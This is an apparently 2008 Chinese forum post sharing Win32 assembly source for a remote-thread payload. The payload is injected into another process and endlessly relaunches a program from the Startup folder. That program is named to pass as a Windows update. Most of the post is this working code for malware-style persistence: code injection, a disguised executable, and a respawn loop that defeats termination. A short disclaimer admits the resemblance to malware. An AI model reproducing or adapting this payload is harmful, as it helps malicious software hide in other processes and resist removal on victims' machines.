用远线程保护进程(win32汇编)
*/ --------------------------------------------------------------------------------------*/ 出自: 编程中国 https://www.bccn.net
*/ 作者: zklhp E-mail:zklhp@ QQ:493165744
*/ 时间: 2008-11-29 编程论坛首发
*/ 声明: 尊重作者劳动,转载请保留本段文字
*/ --------------------------------------------------------------------------------------
接着上次那篇，这次再写一个做“保护”的远线程：被保护的进程一旦不在了，就由注入线程所在的宿主进程把它重新启动起来。没什么新意，就是总结一下吧。
贴一下远线程里执行的那段代码吧（把它写进目标进程并开远线程的注入部分不在这里）。
程序代码:
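;-----------------------------------------------------------------------------
; Position-independent "process guardian" payload (MASM, Win32, stdcall).
;
; Everything between Remote_code_start and Remote_code_end is one blob that is
; meant to be copied into another process and started there as a thread. The
; injector itself is not in this listing; the post's title says it uses a
; remote thread, so presumably WriteProcessMemory + CreateRemoteThread, with
; g_lpGetModuleHandleA / g_lpGetProcAddress filled in before the thread starts.
; Because the blob lands wherever the host process puts it, every data
; reference is relative to ebx, which `call delta / pop ebx` sets to the
; runtime address of `delta` (delta-offset relocation).
;
; Behaviour: forever, take a Toolhelp32 process snapshot, look for
; g_szProcessName, and if it is not running start g_szPath on the interactive
; desktop; then sleep CHECK_INTERVAL_MS and repeat. The thread never returns
; on its own; it only exits if an import cannot be resolved.
;
; SECURITY NOTE (review): this is exactly the watchdog/persistence pattern
; malware uses to keep a dropped executable alive (the path below is the
; all-users Startup folder). AV products are right to flag it. Only run it in
; an isolated lab VM against a process you own.
;-----------------------------------------------------------------------------
.code

CHECK_INTERVAL_MS   equ 300             ; poll period between snapshots (ms)

;-----------------------------------------------------------------------------
; RESOLVE_API name
;   eax = GetProcAddress(esi, "name"); stores it in g_lp<name>.
;   Assumes esi = hKernel32 and ebx = delta base. Leaves the thread via @bail
;   if the export is missing, so we never call through a NULL pointer inside
;   the host process.
;-----------------------------------------------------------------------------
RESOLVE_API macro name
    lea     eax, [ebx+(g_sz&name&-delta)]
    _invoke [ebx+(g_lpGetProcAddress-delta)], esi, eax
    test    eax, eax
    jz      @bail
    mov     [ebx+(g_lp&name&-delta)], eax
endm

Remote_code_start   equ this BYTE

; --- inputs the injector fills in before starting the thread ---------------
g_lpGetModuleHandleA        dd 0
g_lpGetProcAddress          dd 0

; --- imports resolved at runtime inside the host process -------------------
g_szKernel32                 db 'Kernel32.dll',0
g_hKernel32                  dd 0
g_szCreateProcessA           db 'CreateProcessA',0
g_lpCreateProcessA           dd 0
g_szCreateToolhelp32Snapshot db 'CreateToolhelp32Snapshot',0
g_lpCreateToolhelp32Snapshot dd 0
g_szProcess32First           db 'Process32First',0
g_lpProcess32First           dd 0
g_szProcess32Next            db 'Process32Next',0
g_lpProcess32Next            dd 0
g_szlstrcmpiA                db 'lstrcmpiA',0
g_lplstrcmpiA                dd 0
g_szCloseHandle              db 'CloseHandle',0
g_lpCloseHandle              dd 0
g_szSleep                    db 'Sleep',0
g_lpSleep                    dd 0

; --- guarded process: image name to look for, full path to relaunch --------
g_szProcessName db 'WindowsXP-KB88168-x86-CHS.exe',0
g_szPath        db 'C:\Documents and Settings\All Users\「开始」菜单\程序\启动\WindowsXP-KB88168-x86-CHS.exe',0   ; pairs with the earlier program in this series
g_szDesktop     db 'WinSta0\Default',0  ; interactive desktop, so the child can show UI

; --- scratch state ----------------------------------------------------------
g_stProcess     PROCESSENTRY32 <0>
g_hSnapshot     dd 0                    ; not referenced in this listing (snapshot handle lives in edi)
g_dwProcessID   dd 0                    ; not referenced in this listing
g_bFound        dd 0                    ; TRUE once the snapshot walk has seen g_szProcessName
g_stStartupInfo STARTUPINFO <0>
g_ProcInfo      PROCESS_INFORMATION <0>

;-----------------------------------------------------------------------------
; _RemoteThread — thread entry point inside the host process.
;
; Register roles (stable across the loop):
;   ebx = runtime address of `delta`; all data is addressed as [ebx+(sym-delta)]
;   esi = hKernel32 during import resolution, scratch pointer afterwards
;   edi = current Toolhelp32 snapshot handle
; Returns only via @bail (import resolution failed); otherwise loops forever.
;-----------------------------------------------------------------------------
_RemoteThread proc
    pushad
    call    delta
delta:
    pop     ebx                         ; ebx = &delta at runtime; no subtraction needed
                                        ; (CIH-style relocation, saves a few bytes)

    ; --- resolve every import once: we are in someone else's address space ---
    lea     eax, [ebx+(g_szKernel32-delta)]
    _invoke [ebx+(g_lpGetModuleHandleA-delta)], eax
    test    eax, eax
    jz      @bail                       ; no kernel32 handle: nothing below can work
    mov     [ebx+(g_hKernel32-delta)], eax
    mov     esi, eax                    ; esi = hKernel32 for RESOLVE_API

    RESOLVE_API CreateProcessA
    RESOLVE_API CreateToolhelp32Snapshot
    RESOLVE_API Process32First
    RESOLVE_API Process32Next
    RESOLVE_API lstrcmpiA
    RESOLVE_API CloseHandle
    RESOLVE_API Sleep

@loop:
    mov     DWORD ptr [ebx+(g_bFound-delta)], FALSE

    lea     esi, [ebx+(g_stProcess-delta)]
    assume  esi:ptr PROCESSENTRY32
    mov     [esi].dwSize, sizeof PROCESSENTRY32   ; Process32First fails without it
    assume  esi:nothing

    _invoke [ebx+(g_lpCreateToolhelp32Snapshot-delta)], TH32CS_SNAPPROCESS, 0
    mov     edi, eax                    ; edi = hSnapshot
    .if edi != INVALID_HANDLE_VALUE     ; snapshot failed: skip this round, retry after the sleep
        lea     ecx, [ebx+(g_stProcess-delta)]
        _invoke [ebx+(g_lpProcess32First-delta)], edi, ecx
        .while eax
            lea     esi, [ebx+(g_stProcess-delta)]
            assume  esi:ptr PROCESSENTRY32
            lea     edx, [esi].szExeFile
            assume  esi:nothing
            lea     ecx, [ebx+(g_szProcessName-delta)]
            _invoke [ebx+(g_lplstrcmpiA-delta)], ecx, edx    ; case-insensitive name match
            .if eax == 0
                mov     DWORD ptr [ebx+(g_bFound-delta)], TRUE
                .break
            .endif
            lea     ecx, [ebx+(g_stProcess-delta)]
            _invoke [ebx+(g_lpProcess32Next-delta)], edi, ecx
        .endw
        _invoke [ebx+(g_lpCloseHandle-delta)], edi

        .if DWORD ptr [ebx+(g_bFound-delta)] == FALSE
            ; --- guarded process is gone: relaunch it on the interactive desktop ---
            lea     eax, [ebx+(g_szDesktop-delta)]
            lea     ecx, [ebx+(g_stStartupInfo-delta)]
            assume  ecx:ptr STARTUPINFO
            mov     [ecx].cb, sizeof STARTUPINFO
            mov     [ecx].lpDesktop, eax
            assume  ecx:nothing
            lea     eax, [ebx+(g_szPath-delta)]
            lea     edx, [ebx+(g_ProcInfo-delta)]
            ; The path goes in lpApplicationName (arg 1), not lpCommandLine:
            ; it contains spaces and is unquoted, so as a command line
            ; CreateProcess would first probe "C:\Documents.exe",
            ; "C:\Documents and.exe", ... (unquoted-path hijack).
            _invoke [ebx+(g_lpCreateProcessA-delta)], eax, 0, 0, 0, 0, 0, 0, 0, ecx, edx
            .if eax
                ; Close both returned handles; otherwise every respawn leaks
                ; a process and a thread handle inside the host.
                lea     esi, [ebx+(g_ProcInfo-delta)]
                assume  esi:ptr PROCESS_INFORMATION
                mov     eax, [esi].hThread
                _invoke [ebx+(g_lpCloseHandle-delta)], eax
                mov     eax, [esi].hProcess
                _invoke [ebx+(g_lpCloseHandle-delta)], eax
                assume  esi:nothing
            .endif
        .endif
    .endif

    ; Killed one moment, back the next. Tune CHECK_INTERVAL_MS: too short
    ; just burns CPU in the host.
    _invoke [ebx+(g_lpSleep-delta)], CHECK_INTERVAL_MS
    jmp     @loop

@bail:
    popad
    ret
_RemoteThread endp

Remote_code_end     equ this BYTE
Remote_code_length  equ offset Remote_code_end - offset Remote_code_start   ; byte count the injector copies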
在我的 Windows 2003 上运行没问题。注意被拉起的路径是写死的 XP/2003 风格的 `C:\Documents and Settings\...\启动` 目录，换系统要相应修改。
这段代码会被杀毒软件报为病毒，这很正常：往别的进程里写代码并开远线程、再从“启动”目录里反复把一个程序拉起来，跟恶意软件做进程守护/持久化的手法是一样的，杀软报毒是对的。请只在隔离的虚拟机里、对自己的进程测试；因使用造成的后果与我无关。
还是那句话 别干坏事啊
参考了罗云彬的程序 向前辈的无私奉献精神表示感谢
程序+代码
RemoteThreadProtect.rar
(7.31 KB)
这个是被保护的进程 就是那个弹窗口的程序(前几天静老大审核时没笑翻吧) 做了点改动
MessageBox.rar
(6.46 KB)